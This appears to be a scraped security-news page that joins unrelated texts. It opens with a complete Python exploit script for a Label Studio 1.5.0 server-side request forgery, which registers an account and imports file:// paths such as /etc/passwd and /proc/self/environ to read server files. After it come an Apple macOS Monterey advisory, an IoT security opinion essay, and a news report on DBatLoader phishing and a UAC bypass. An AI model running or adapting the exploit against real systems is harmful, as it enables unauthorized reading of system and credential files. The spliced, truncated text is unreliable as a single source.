urljoinfrom urllib.parse import urlparserequests.packages.urllib3.disable_warnings() # main function for exploitdef main(url, filePath, writePath, username, password, shouldRegister):    # check if the URL is reachable    try:        r = requests.get(url, verify=False)        if r.status_code == 200:            print("[+] URL is reachable")        else:            print("[!] Error: URL is not reachable, check the URL and try again")            exit(1)    except requests.exceptions.RequestException as e:        print("[!] Error: URL is not reachable, check the URL and try again")        exit(1)    session = requests.Session()    login(session, url, username, password, shouldRegister)    print("[+] Logged in")    print("[+] Creating project...")    # Create a temp project    projectDetails = create_project(session, url)    print("[+] Project created, ID: {}".format(projectDetails["id"]))    #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)    print("[+] Attempting to fetch: {}".format(filePath))    fetch_file(session, url, projectDetails["id"], filePath, writePath)    print("[+] Deleting Project.. {}".format(projectDetails["id"]))    delete_project(session, url, projectDetails["id"])    print("[+] Project Deleted")    print("[*] Finished executing exploit")# login, logs the user indef login(session, url, username, password, shouldRegister):    # hit the main page first to get the CSRF token set    r = session.get(url, verify=False)    r = session.post(        urljoin(url, "/user/login"),        data={            "email": username,            "password": password,            "csrfmiddlewaretoken": session.cookies["csrftoken"],        },        verify=False    )    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:        return    elif r.text.find("The email and password you entered") > 0 and shouldRegister:                        print("[!] Account does not exist, registering...")        r = session.post(            urljoin(url, "/user/signup/"),            data={                "email": username,                "password": password,                "csrfmiddlewaretoken": session.cookies["csrftoken"],                'allow_newsletters': False,            },        )        if r.status_code == 302:            # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)            return    else:        print("[!] Error: Could not login, check the credentials and try again")        exit(1)# create_project creates a temporary project for exploiting the SSRFdef create_project(session, url):    r = session.post(        urljoin(url, "/api/projects"),        data={            "title": "TPS Report Finder",        },        verify=False    )    if r.status_code == 200 or r.status_code == 201:        return r.json()    else:        print("[!] Error: Could not create project, check your credentials / permissions")        exit(1)def fetch_file(session, url, projectId, filePath, writePath):    # if scheme is empty prepend file://    parsedFilePath = urlparse(filePath)    if parsedFilePath.scheme == "":        filePath = "file://" + filePath    headers = {        'Content-Type': 'application/x-www-form-urlencoded'    }    url = urljoin(url, "/api/projects/{}/import".format(projectId))    r = session.post(url,        data={            "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL        },        headers=headers,         verify=False    )    if r.status_code == 201:        # file found! -- first grab the file path details        fileId = r.json()["file_upload_ids"][0]        r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)        r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)        print("[+] File found!")        # if user wants to write to disk, make it so        if writePath != None:            print("[+] Writing to {}".format(writePath))            # write the file to disk            with open(writePath, 'wb') as handle:                shutil.copyfileobj(r.raw, handle)                handle.close()            return        else:            print("==========================================================")            print(r.text)            print("==========================================================")            return    else:        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")        print("\t" + r.json()["validation_errors"]["non_field_errors"][0])        returndef delete_project(session, url, projectId):    url = urljoin(url, "/api/projects/{}".format(projectId))    r = session.delete(url, verify=False)    if r.status_code == 200 or r.status_code == 204:        return    else:        print( "[!] Error: Could not delete project, check your credentials / permissions")        exit(1)parser = argparse.ArgumentParser()parser.add_argument("--url", required=True, help="Label Studio URL")parser.add_argument("--file", required=True, help="Path to the file you want to fetch")parser.add_argument("--out", required=False, help="Path to write the file.  If omitted will be written to STDOUT")parser.add_argument("--username", required=False, help="Username for existing account (email)")parser.add_argument("--password", required=False, help="Password for existing account")parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",)args = parser.parse_args()main(args.url, args.file, args.out, args.username, args.password, args.register)

Label Studio 1.5.0 Server-Side Request Forgery

Apple Security Advisory 2023-03-27-4 - macOS Monterey 12.6.4 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-4 macOS Monterey 12.6.4

macOS Monterey 12.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213677.

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Monterey  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Monterey  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

ColorSync  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Foundation  
Available for: macOS Monterey  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Model I/O  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27949: Mickey Jin (@patch1t)

NetworkExtension  
Available for: macOS Monterey  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23538: Mickey Jin (@patch1t)  
CVE-2023-27962: Mickey Jin (@patch1t)

Podcasts  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI  
Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved validation.  
CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies and  
Wenchao Li and Xiaolong Bai of Alibaba Group

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Monterey  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Monterey  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Monterey 12.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxn7kg/9FdItHdT/4pNdkvgRRdAppZbLHwvTICqQL5NW9r2at6bsEVI4euNmz6Nc  
tZev1qAgiHKohwtblwLmt5x7T6j4GJ/JlR/6owBhu2K3Zd+dMfFyz3Azgb9o/3JM  
SDLhOGilCQxrg/MBMvT1GVOhDbGZpj8CdVj5zux0cEOW070fsVAeU8U8eUsa9Oer  
Ihoys5FSfQ9Wvl8jtTuAQE2kuoh/vwnThpT1XEp95fW4u98GkTyoZDk01/aVuNDN  
nuqnJVAi12V3pWeT19wWk2osILE7cdLFWi3d5qK7YHUhy/YsVRMwwPUVPPSYq3bF  
RIZmBCHNO1TJniM/0Ji6FyPwQpt0v0kabxZnYLy/0pilRsMlJNPhcTm6CTCCKp/M  
YBhiJMIZcxr6qjzb4yq+VO1bSS0bjFZYJBM71fb0MBdnl2ogLYRh8c+WvDA/Avmq  
fjXxpAH/wXkO1J+ccJl+5ESIP6eEc+jm8ra5oiZETDRO3UhPtcHWPSJcKKzIyv9U  
ZP+4jYDmDeNAzpS6b/sI+1DD86ozxv2WdFGo1k7P0o8AFb4XnY4GoZYy7cOAm5EA  
FUyJokGkgByuvu9XhbEzSM/K24dQziWTj2eNMXXl/FV5/1A629ZcCAXKwzO+0dYF  
tthhKi6q7oFAIBB5FiapaJNQsazipx+XGFKQUNDZAmuG4GsIiFg=  
=GR5+  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-4

IoT risk and security must get more attention from vendors and support from the marketplace.

The Internet of Things (IoT) is and always will be a contentious subject for cybersecurity. Not because of the convenience these devices add but for the risk they inject into the lives of people and businesses.

As cybersecurity professionals, we often quote cynical jokes to laugh and cope with the reality of our jobs. So stop me if you've heard this one: Did you know that the S in IoT stands for security? Half of you chuckled at it, and the other half probably took a second to realize that there is no S or security in the IoT acronym.

As cybersecurity professionals, we're often stuck between a rock and a hard place when assessing the risk these devices pose to us personally and professionally. There are more than a billion IoT devices on the Internet, each with the potential to be exploited. A business might have a compelling business imperative an IoT solution can enable, but that solution may inject an undue security risk into protecting safety and productivity. A Wi-Fi-connected security camera may give a homeowner peace of mind about securing a property, but may also expose that property to additional risk from hackers who can take control of the camera and abuse the platform.

**Market Forces vs. IoT Vendors**

So how did we get here? The easy answer is: IoT vendors continue to fail us on implementing solid cybersecurity controls. The difficult answer is: The market continues to push many IoT vendors into offering the lowest cost and most competitive products. They achieve this by sacrificing or outright neglecting cybersecurity for their solutions.

By choosing to not address security, vendors are pushing the risk to the consumers who are often oblivious to the dangers. In commercial solutions, this can have serious consequences. A medical facility that relies on IoT devices to manage patient care cannot weather an outage without endangering patients. Nor would they want patient data inadvertently exposed due to insecure IoT devices, or worse, have actual medical care disrupted.

So how did we, as consumers and dependents of IoT, get here to this untenable state of IoT risk and security? The answers, as they always seem to do, eventually lead back to money.

There are quite a few big-name players in the commercial and residential IoT space. These are name brands that most everyone can recognize: Google, Huawei, Microsoft, and others. While these companies are mature and responsive to security threats in IoT, it's the more niche companies that are more concerning.

**IoT Cost Points**

So, here's a thought experiment. Imagine you're a small IoT company and you want to develop a niche product that will enter an already crowded IoT market. What kind of costs does it take to develop the IoT product? Some cost points to consider:

**1\. Qualified development personnel are hard to come by for IoT.** You will need a solid team of hardware, networking, application design, business intelligence and automation experts to help bring your product to market.

**2\. Hardware and software costs can range from small to huge sums of money.** The more complex the device and service, the higher the cost.

**3\. What is the connection model?** Wi-Fi, Bluetooth, cellular? Each adds more to the cost, some more than others.

**4\. You must design a product UI!** If you intend to win on the merits of your product, a smooth user experience is a must.

**5\. What about security?** Do we have to use encryption? How about a secure protocol, or hardware that has secure firmware? Well, unless there's a regulatory requirement, there's no money for it. We have to keep costs down if we intend to compete.

**Best IoT Security Development Steps**

While the scenario is a generalization, it's not far from the truth. Developing an IoT product with security features adds to costs many companies either do not consider, or have deliberately chosen to neglect. Further complicating things, what if the company that makes an IoT device no longer supports it? Or what if that company simply goes out of business?

Is any of this resolvable? To an extent, yes. Companies can usually push over-the-air (OTA) updates to products that can address security issues. They can also utilize cloud service frameworks that mandate security between the device, the cloud, and the company. Vendors can also employ outside third parties to audit and evaluate the IoT solution. An outside third party can fairly evaluate and help the vendor address vulnerabilities in the hardware or software. Application developers can be trained in secure software development. The product can be designed with hardware robust enough to accommodate secure implementations.

However, all these things represent monetary investments a company has to willingly make. And the investments are continuous — with every device patch or new feature offering, the same security evaluations have to be performed again and again.

**It's Time to Step Up**

What do we do? The first step is educating the consumers. As security professionals, we must do our best to help others have situational awareness and help evaluate risk. This in turn can help for security investments that can help mitigate the vulnerabilities that some IoT devices inject into our risk models.

Helping call out insecure practices and companies can also help. We have a unique opportunity and position to help advocate for everyone who utilizes an IoT device and should use our voices to help wherever we can.

Spend on Safety Measures & Call Out Insecure Practices for Safer IoT

A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader.
"The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report

A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed **DBatLoader**.

"The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday.

The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain.

Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments.

The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded from the internet.

DBatLoader, also called ModiLoader and NatsoLoader, is a Delphi-based malware that's capable of delivering follow-on payloads from cloud services like Google Drive and Microsoft OneDrive, while also adopting image steganography techniques to evade detection engines.

One notable aspect of the attack is the use of mock trusted directories such as "C:\\Windows \\System32" (note the trailing space after Windows) to bypass User Account Control (UAC) and escalate privileges.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

A caveat here is that the directories cannot be directly created from within the Windows Explorer user interface, instead requiring the attacker to rely on a script to accomplish the task and copy to the folder a rogue DLL and a legitimate executable (easinvoker.exe) that's vulnerable to DLL hijacking in order to load the DLL payload.

This enables the attackers to conduct elevated activities without alerting users, including establishing persistence and adding the "C:\\Users" directory to the Microsoft Defender exclusion list to avoid getting scanned.

To mitigate risks posed by DBatLoader, it's advised to monitor process executions that involve filesystem paths with trailing spaces and consider configuring Windows UAC to Always notify.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google